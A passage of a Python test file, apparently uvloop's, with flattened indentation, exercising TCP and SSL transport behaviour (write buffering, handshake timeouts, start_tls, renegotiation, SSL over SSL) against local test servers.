for bl in (1.1, '1'):
with self.subTest(backlog=bl):
with self.assertRaisesRegex(TypeError, 'integer'):
self.loop.run_until_complete(runner(bl))
def test_many_small_writes(self):
N = 10000
TOTAL = 0
fut = self.loop.create_future()
async def server(reader, writer):
nonlocal TOTAL
while True:
d = await reader.read(10000)
if not d:
break
TOTAL += len(d)
fut.set_result(True)
writer.close()
async def run():
srv = await asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET)
addr = srv.sockets[0].getsockname()
r, w = await asyncio.open_connection(*addr)
DATA = b'x' * 102400
# Test _StreamWriteContext with short sequences of writes
w.write(DATA)
await w.drain()
for _ in range(3):
w.write(DATA)
await w.drain()
for _ in range(10):
w.write(DATA)
await w.drain()
for _ in range(N):
w.write(DATA)
try:
w.write('a')
except TypeError:
pass
await w.drain()
for _ in range(N):
w.write(DATA)
await w.drain()
w.close()
await fut
await self.wait_closed(w)
srv.close()
await srv.wait_closed()
self.assertEqual(TOTAL, N * 2 * len(DATA) + 14 * len(DATA))
self.loop.run_until_complete(run())
@unittest.skipIf(sys.version_info[:3] >= (3, 8, 0),
"3.8 has a different method of GCing unclosed streams")
def test_tcp_handle_unclosed_gc(self):
fut = self.loop.create_future()
async def server(reader, writer):
writer.transport.abort()
fut.set_result(True)
async def run():
addr = srv.sockets[0].getsockname()
await asyncio.open_connection(*addr)
await fut
srv.close()
await srv.wait_closed()
srv = self.loop.run_until_complete(asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET))
if self.loop.get_debug():
rx = r'unclosed resource <TCP.*; ' \
r'object created at(.|\n)*test_tcp_handle_unclosed_gc'
else:
rx = r'unclosed resource <TCP.*'
with self.assertWarnsRegex(ResourceWarning, rx):
self.loop.create_task(run())
self.loop.run_until_complete(srv.wait_closed())
self.loop.run_until_complete(asyncio.sleep(0.1))
srv = None
gc.collect()
gc.collect()
gc.collect()
self.loop.run_until_complete(asyncio.sleep(0.1))
# Since one TCPTransport handle wasn't closed correctly,
# we need to disable this check:
self.skip_unclosed_handles_check()
def test_tcp_handle_abort_in_connection_made(self):
async def server(reader, writer):
try:
await reader.read()
finally:
writer.close()
class Proto(asyncio.Protocol):
def connection_made(self, tr):
tr.abort()
srv = self.loop.run_until_complete(asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET))
async def runner():
tr, pr = await asyncio.wait_for(
self.loop.create_connection(
Proto, *srv.sockets[0].getsockname()),
timeout=1.0)
# Asyncio would return a closed socket, which we
# can't do: the transport was aborted, hence there
# is no FD to attach a socket to (to make
# get_extra_info() work).
self.assertIsNone(tr.get_extra_info('socket'))
tr.close()
self.loop.run_until_complete(runner())
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_connect_accepted_socket_ssl_args(self):
with self.assertRaisesRegex(
ValueError, 'ssl_handshake_timeout is only meaningful'):
with socket.socket() as s:
self.loop.run_until_complete(
self.loop.connect_accepted_socket(
(lambda: None),
s,
ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT
)
)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket(socket.AF_INET)
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket(socket.AF_INET)
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
extras = {}
if server_ssl:
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
f = loop.create_task(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl,
**extras))
loop.run_forever()
conn.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
tr, _ = f.result()
if server_ssl:
self.assertIn('SSL', tr.__class__.__name__)
tr.close()
# let it close
self.loop.run_until_complete(asyncio.sleep(0.1))
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets')
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyBaseProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets')
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyBaseProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_flowcontrol_mixin_set_write_limits(self):
async def client(addr):
paused = False
class Protocol(asyncio.Protocol):
def pause_writing(self):
nonlocal paused
paused = True
def resume_writing(self):
nonlocal paused
paused = False
t, p = await self.loop.create_connection(Protocol, *addr)
t.write(b'q' * 512)
self.assertEqual(t.get_write_buffer_size(), 512)
t.set_write_buffer_limits(low=16385)
self.assertFalse(paused)
self.assertEqual(t.get_write_buffer_limits(), (16385, 65540))
with self.assertRaisesRegex(ValueError, 'high.*must be >= low'):
t.set_write_buffer_limits(high=0, low=1)
t.set_write_buffer_limits(high=1024, low=128)
self.assertFalse(paused)
self.assertEqual(t.get_write_buffer_limits(), (128, 1024))
t.set_write_buffer_limits(high=256, low=128)
self.assertTrue(paused)
self.assertEqual(t.get_write_buffer_limits(), (128, 256))
t.close()
with self.tcp_server(lambda sock: sock.recv_all(1),
max_clients=1,
backlog=1) as srv:
self.loop.run_until_complete(client(srv.addr))
class Test_AIO_TCP(_TestTCP, tb.AIOTestCase):
pass
class _TestSSL(tb.SSLTestCase):
ONLYCERT = tb._cert_fullname(__file__, 'ssl_cert.pem')
ONLYKEY = tb._cert_fullname(__file__, 'ssl_key.pem')
PAYLOAD_SIZE = 1024 * 100
TIMEOUT = 60
def test_create_server_ssl_1(self):
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 10.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
clients = []
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
data = await reader.readexactly(len(B_DATA))
self.assertEqual(data, B_DATA)
writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')])
await writer.drain()
writer.close()
CNT += 1
async def test_client(addr):
fut = asyncio.Future()
def prog(sock):
try:
sock.starttls(client_sslctx)
sock.connect(addr)
sock.send(A_DATA)
data = sock.recv_all(2)
self.assertEqual(data, b'OK')
sock.send(B_DATA)
data = sock.recv_all(4)
self.assertEqual(data, b'SPAM')
sock.close()
except Exception as ex:
self.loop.call_soon_threadsafe(fut.set_exception, ex)
else:
self.loop.call_soon_threadsafe(fut.set_result, None)
client = self.tcp_client(prog)
client.start()
clients.append(client)
await fut
async def start_server():
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
ssl=sslctx,
**extras)
try:
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
finally:
self.loop.call_soon(srv.close)
await srv.wait_closed()
with self._silence_eof_received_warning():
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
for client in clients:
client.stop()
def test_create_connection_ssl_1(self):
if self.implementation == 'asyncio':
# Don't crash on asyncio errors
self.loop.set_exception_handler(None)
CNT = 0
TOTAL_CNT = 25
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
def server(sock):
sock.starttls(
sslctx,
server_side=True)
data = sock.recv_all(len(A_DATA))
self.assertEqual(data, A_DATA)
sock.send(b'OK')
data = sock.recv_all(len(B_DATA))
self.assertEqual(data, B_DATA)
sock.send(b'SPAM')
sock.close()
async def client(addr):
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
**extras)
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
async def client_sock(addr):
sock = socket.socket()
sock.connect(addr)
reader, writer = await asyncio.open_connection(
sock=sock,
ssl=client_sslctx,
server_hostname='')
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
sock.close()
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
with self._silence_eof_received_warning():
run(client)
with self._silence_eof_received_warning():
run(client_sock)
def test_create_connection_ssl_slow_handshake(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
client_sslctx = self._create_client_ssl_context()
# silence error logger
self.loop.set_exception_handler(lambda *args: None)
def server(sock):
try:
sock.recv_all(1024 * 1024)
except ConnectionAbortedError:
pass
finally:
sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
ssl_handshake_timeout=1.0)
writer.close()
await self.wait_closed(writer)
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaisesRegex(
ConnectionAbortedError,
r'SSL handshake.*is taking longer'):
self.loop.run_until_complete(client(srv.addr))
def test_create_connection_ssl_failed_certificate(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
# silence error logger
self.loop.set_exception_handler(lambda *args: None)
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context(disable_verify=False)
def server(sock):
try:
sock.starttls(
sslctx,
server_side=True)
sock.connect()
except (ssl.SSLError, OSError):
pass
finally:
sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
ssl_handshake_timeout=1.0)
writer.close()
await self.wait_closed(writer)
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaises(ssl.SSLCertVerificationError):
self.loop.run_until_complete(client(srv.addr))
def test_start_tls_wrong_args(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
async def main():
with self.assertRaisesRegex(TypeError, 'SSLContext, got'):
await self.loop.start_tls(None, None, None)
sslctx = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
with self.assertRaisesRegex(TypeError, 'is not supported'):
await self.loop.start_tls(None, None, sslctx)
self.loop.run_until_complete(main())
def test_ssl_handshake_timeout(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
# bpo-29970: Check that a connection is aborted if handshake is not
# completed in timeout period, instead of remaining open indefinitely
client_sslctx = self._create_client_ssl_context()
# silence error logger
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
server_side_aborted = False
def server(sock):
nonlocal server_side_aborted
try:
sock.recv_all(1024 * 1024)
except ConnectionAbortedError:
server_side_aborted = True
finally:
sock.close()
async def client(addr):
await asyncio.wait_for(
self.loop.create_connection(
asyncio.Protocol,
*addr,
ssl=client_sslctx,
server_hostname='',
ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT
),
0.5
)
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(client(srv.addr))
self.assertTrue(server_side_aborted)
# Python issue #23197: cancelling a handshake must not raise an
# exception or log an error, even if the handshake failed
self.assertEqual(messages, [])
def test_ssl_handshake_connection_lost(self):
# #246: make sure that no connection_lost() is called before
# connection_made() is called first
client_sslctx = self._create_client_ssl_context()
# silence error logger
self.loop.set_exception_handler(lambda loop, ctx: None)
connection_made_called = False
connection_lost_called = False
def server(sock):
sock.recv(1024)
# break the connection during handshake
sock.close()
class ClientProto(asyncio.Protocol):
def connection_made(self, transport):
nonlocal connection_made_called
connection_made_called = True
def connection_lost(self, exc):
nonlocal connection_lost_called
connection_lost_called = True
async def client(addr):
await self.loop.create_connection(
ClientProto,
*addr,
ssl=client_sslctx,
server_hostname=''),
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaises(ConnectionResetError):
self.loop.run_until_complete(client(srv.addr))
if connection_lost_called:
if connection_made_called:
self.fail("unexpected call to connection_lost()")
else:
self.fail("unexpected call to connection_lost() without"
"calling connection_made()")
elif connection_made_called:
self.fail("unexpected call to connection_made()")
def test_ssl_connect_accepted_socket(self):
if hasattr(ssl, 'PROTOCOL_TLS'):
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
server_context = ssl.SSLContext(proto)
server_context.load_cert_chain(self.ONLYCERT, self.ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(proto)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
Test_UV_TCP.test_connect_accepted_socket(
self, server_context, client_context)
def test_start_tls_client_corrupted_ssl(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
self.loop.set_exception_handler(lambda loop, ctx: None)
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
def server(sock):
orig_sock = sock.dup()
try:
sock.starttls(
sslctx,
server_side=True)
sock.sendall(b'A\n')
sock.recv_all(1)
orig_sock.send(b'please corrupt the SSL connection')
except ssl.SSLError:
pass
finally:
sock.close()
orig_sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
self.assertEqual(await reader.readline(), b'A\n')
writer.write(b'B')
with self.assertRaises(ssl.SSLError):
await reader.readline()
writer.close()
try:
await self.wait_closed(writer)
except ssl.SSLError:
pass
return 'OK'
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
res = self.loop.run_until_complete(client(srv.addr))
self.assertEqual(res, 'OK')
def test_start_tls_client_reg_proto_1(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
def serve(sock):
sock.settimeout(self.TIMEOUT)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.starttls(server_context, server_side=True)
sock.sendall(b'O')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.unwrap()
sock.close()
class ClientProto(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(proto, tr):
proto.con_made_cnt += 1
# Ensure connection_made gets called only once.
self.assertEqual(proto.con_made_cnt, 1)
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProto(on_data, on_eof), *addr)
tr.write(HELLO_MSG)
new_tr = await self.loop.start_tls(tr, proto, client_context)
self.assertEqual(await on_data, b'O')
new_tr.write(HELLO_MSG)
await on_eof
new_tr.close()
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr), timeout=10))
def test_create_connection_memory_leak(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
def serve(sock):
sock.settimeout(self.TIMEOUT)
sock.starttls(server_context, server_side=True)
sock.sendall(b'O')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.unwrap()
sock.close()
class ClientProto(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(proto, tr):
# XXX: We assume user stores the transport in protocol
proto.tr = tr
proto.con_made_cnt += 1
# Ensure connection_made gets called only once.
self.assertEqual(proto.con_made_cnt, 1)
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProto(on_data, on_eof), *addr,
ssl=client_context)
self.assertEqual(await on_data, b'O')
tr.write(HELLO_MSG)
await on_eof
tr.close()
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr), timeout=10))
# No garbage is left for SSL client from loop.create_connection, even
# if user stores the SSLTransport in corresponding protocol instance
client_context = weakref.ref(client_context)
self.assertIsNone(client_context())
def test_start_tls_client_buf_proto_1(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
client_con_made_calls = 0
def serve(sock):
sock.settimeout(self.TIMEOUT)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.starttls(server_context, server_side=True)
sock.sendall(b'O')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.sendall(b'2')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.unwrap()
sock.close()
class ClientProtoFirst(asyncio.BaseProtocol):
def __init__(self, on_data):
self.on_data = on_data
self.buf = bytearray(1)
def connection_made(self, tr):
nonlocal client_con_made_calls
client_con_made_calls += 1
def get_buffer(self, sizehint):
return self.buf
def buffer_updated(self, nsize):
assert nsize == 1
self.on_data.set_result(bytes(self.buf[:nsize]))
def eof_received(self):
pass
class ClientProtoSecond(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(self, tr):
nonlocal client_con_made_calls
client_con_made_calls += 1
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data1 = self.loop.create_future()
on_data2 = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProtoFirst(on_data1), *addr)
tr.write(HELLO_MSG)
new_tr = await self.loop.start_tls(tr, proto, client_context)
self.assertEqual(await on_data1, b'O')
new_tr.write(HELLO_MSG)
new_tr.set_protocol(ClientProtoSecond(on_data2, on_eof))
self.assertEqual(await on_data2, b'2')
new_tr.write(HELLO_MSG)
await on_eof
new_tr.close()
# connection_made() should be called only once -- when
# we establish connection for the first time. Start TLS
# doesn't call connection_made() on application protocols.
self.assertEqual(client_con_made_calls, 1)
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr),
timeout=self.TIMEOUT))
def test_start_tls_slow_client_cancel(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
client_context = self._create_client_ssl_context()
server_waits_on_handshake = self.loop.create_future()
def serve(sock):
sock.settimeout(self.TIMEOUT)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
try:
self.loop.call_soon_threadsafe(
server_waits_on_handshake.set_result, None)
data = sock.recv_all(1024 * 1024)
except ConnectionAbortedError:
pass
finally:
sock.close()
class ClientProto(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(proto, tr):
proto.con_made_cnt += 1
# Ensure connection_made gets called only once.
self.assertEqual(proto.con_made_cnt, 1)
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProto(on_data, on_eof), *addr)
tr.write(HELLO_MSG)
await server_waits_on_handshake
with self.assertRaises(asyncio.TimeoutError):
await asyncio.wait_for(
self.loop.start_tls(tr, proto, client_context),
0.5)
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr), timeout=10))
def test_start_tls_server_1(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
def client(sock, addr):
sock.settimeout(self.TIMEOUT)
sock.connect(addr)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.starttls(client_context)
sock.sendall(HELLO_MSG)
sock.unwrap()
sock.close()
class ServerProto(asyncio.Protocol):
def __init__(self, on_con, on_eof, on_con_lost):
self.on_con = on_con
self.on_eof = on_eof
self.on_con_lost = on_con_lost
self.data = b''
def connection_made(self, tr):
self.on_con.set_result(tr)
def data_received(self, data):
self.data += data
def eof_received(self):
self.on_eof.set_result(1)
def connection_lost(self, exc):
if exc is None:
self.on_con_lost.set_result(None)
else:
self.on_con_lost.set_exception(exc)
async def main(proto, on_con, on_eof, on_con_lost):
tr = await on_con
tr.write(HELLO_MSG)
self.assertEqual(proto.data, b'')
new_tr = await self.loop.start_tls(
tr, proto, server_context,
server_side=True,
ssl_handshake_timeout=self.TIMEOUT)
await on_eof
await on_con_lost
self.assertEqual(proto.data, HELLO_MSG)
new_tr.close()
async def run_main():
on_con = self.loop.create_future()
on_eof = self.loop.create_future()
on_con_lost = self.loop.create_future()
proto = ServerProto(on_con, on_eof, on_con_lost)
server = await self.loop.create_server(
lambda: proto, '127.0.0.1', 0)
addr = server.sockets[0].getsockname()
with self.tcp_client(lambda sock: client(sock, addr),
timeout=self.TIMEOUT):
await asyncio.wait_for(
main(proto, on_con, on_eof, on_con_lost),
timeout=self.TIMEOUT)
server.close()
await server.wait_closed()
self.loop.run_until_complete(run_main())
def test_create_server_ssl_over_ssl(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest('asyncio does not support SSL over SSL')
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 20.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx_1 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx_1 = self._create_client_ssl_context()
sslctx_2 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx_2 = self._create_client_ssl_context()
clients = []
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
data = await reader.readexactly(len(B_DATA))
self.assertEqual(data, B_DATA)
writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')])
await writer.drain()
writer.close()
CNT += 1
class ServerProtocol(asyncio.StreamReaderProtocol):
def connection_made(self, transport):
super_ = super()
transport.pause_reading()
fut = self._loop.create_task(self._loop.start_tls(
transport, self, sslctx_2, server_side=True))
def cb(_):
try:
tr = fut.result()
except Exception as ex:
super_.connection_lost(ex)
else:
super_.connection_made(tr)
fut.add_done_callback(cb)
def server_protocol_factory():
reader = asyncio.StreamReader()
protocol = ServerProtocol(reader, handle_client)
return protocol
async def test_client(addr):
fut = asyncio.Future()
def prog(sock):
try:
sock.connect(addr)
sock.starttls(client_sslctx_1)
# because wrap_socket() doesn't work correctly on
# SSLSocket, we have to do the 2nd level SSL manually
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = client_sslctx_2.wrap_bio(incoming, outgoing)
def do(func, *args):
while True:
try:
rv = func(*args)
break
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(65536))
if outgoing.pending:
sock.send(outgoing.read())
return rv
do(sslobj.do_handshake)
do(sslobj.write, A_DATA)
data = do(sslobj.read, 2)
self.assertEqual(data, b'OK')
do(sslobj.write, B_DATA)
data = b''
while True:
chunk = do(sslobj.read, 4)
if not chunk:
break
data += chunk
self.assertEqual(data, b'SPAM')
do(sslobj.unwrap)
sock.close()
except Exception as ex:
self.loop.call_soon_threadsafe(fut.set_exception, ex)
sock.close()
else:
self.loop.call_soon_threadsafe(fut.set_result, None)
client = self.tcp_client(prog)
client.start()
clients.append(client)
await fut
async def start_server():
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
srv = await self.loop.create_server(
server_protocol_factory,
'127.0.0.1', 0,
family=socket.AF_INET,
ssl=sslctx_1,
**extras)
try:
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
finally:
self.loop.call_soon(srv.close)
await srv.wait_closed()
with self._silence_eof_received_warning():
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
for client in clients:
client.stop()
def test_renegotiation(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest('asyncio does not support renegotiation')
CNT = 0
TOTAL_CNT = 25
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx = openssl_ssl.Context(openssl_ssl.TLSv1_2_METHOD)
if hasattr(openssl_ssl, 'OP_NO_SSLV2'):
sslctx.set_options(openssl_ssl.OP_NO_SSLV2)
sslctx.use_privatekey_file(self.ONLYKEY)
sslctx.use_certificate_chain_file(self.ONLYCERT)
client_sslctx = self._create_client_ssl_context()
if hasattr(ssl, 'OP_NO_TLSv1_3'):
client_sslctx.options |= ssl.OP_NO_TLSv1_3
def server(sock):
conn = openssl_ssl.Connection(sslctx, sock)
conn.set_accept_state()
data = b''
while len(data) < len(A_DATA):
try:
chunk = conn.recv(len(A_DATA) - len(data))
if not chunk:
break
data += chunk
except openssl_ssl.WantReadError:
pass
self.assertEqual(data, A_DATA)
conn.renegotiate()
if conn.renegotiate_pending():
conn.send(b'OK')
else:
conn.send(b'ER')
data = b''
while len(data) < len(B_DATA):
try:
chunk = conn.recv(len(B_DATA) - len(data))
if not chunk:
break
data += chunk
except openssl_ssl.WantReadError:
pass
self.assertEqual(data, B_DATA)
if conn.renegotiate_pending():
conn.send(b'ERRO')
else:
conn.send(b'SPAM')
conn.shutdown()
async def client(addr):
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
**extras)
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
async def client_sock(addr):
sock = socket.socket()
sock.connect(addr)
reader, writer = await asyncio.open_connection(
sock=sock,
ssl=client_sslctx,
server_hostname='')
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
sock.close()
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(
asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
with self._silence_eof_received_warning():
run(client)
with self._silence_eof_received_warning():
run(client_sock)
def test_shutdown_timeout(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
